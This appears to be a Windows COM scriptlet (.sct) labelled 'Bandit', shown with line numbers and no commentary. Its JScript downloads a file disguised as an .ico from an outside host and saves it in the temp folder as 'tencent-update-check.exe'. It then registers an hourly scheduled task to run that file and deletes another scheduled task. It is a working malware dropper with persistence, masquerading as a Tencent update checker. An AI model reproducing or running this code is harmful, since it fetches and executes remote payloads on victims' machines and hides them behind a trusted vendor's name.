<?XML version="1.0"?><scriptlet><registration description="Bandit"

1. <?XML version="1.0"?>
2. <scriptlet>
3.  
4. <registration
5. description="Bandit"
6. progid="Bandit"
7. version="1.00"
8. classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
9. remotable="true"
10. >
11. </registration>
12.  
13. <script language="JScript">
14. <![CDATA[
15. var WSHShell = new ActiveXObject("WScript.Shell");
16. path = WSHShell.ExpandEnvironmentStrings("%temp%");
17. var filepath = path+"/tencent-update-check.exe";
18. var xhr = new ActiveXObject("MSXML2.XMLHTTP");
19. xhr.open("GET","https://valtn.me/tmp-files/dl/9f3180daecb8946de47cb152f24ed47a/50c6c8fe.ico", false);
20. xhr.send();
21. if (xhr.Status == 200) {
22. var fso = new ActiveXObject("Scripting.FileSystemObject");
23. var stream = new ActiveXObject("ADODB.Stream");
24. stream.Open();
25. stream.Type = 1;
26. stream.Write(xhr.ResponseBody);
27. stream.Position = 0;
28. if (fso.FileExists(filepath)){
29. fso.DeleteFile(filepath);
30. }
31. stream.SaveToFile(filepath);
32. stream.Close();
33. var kabasky = new ActiveXObject("WScript.Shell").Run('schtasks /Create /SC hourly /TN Tencent-Update-Check /TR "%temp%/tencent-update-check.exe" /ST 00:56:00',0, true);
34. var zhudongfangyu = new ActiveXObject("WScript.Shell").Run('schtasks /Delete /TN Windows-WorkStatin-Job /F',0, true);
35. }
36.  
37. ]]>
38. </script>
39.  
40. </scriptlet>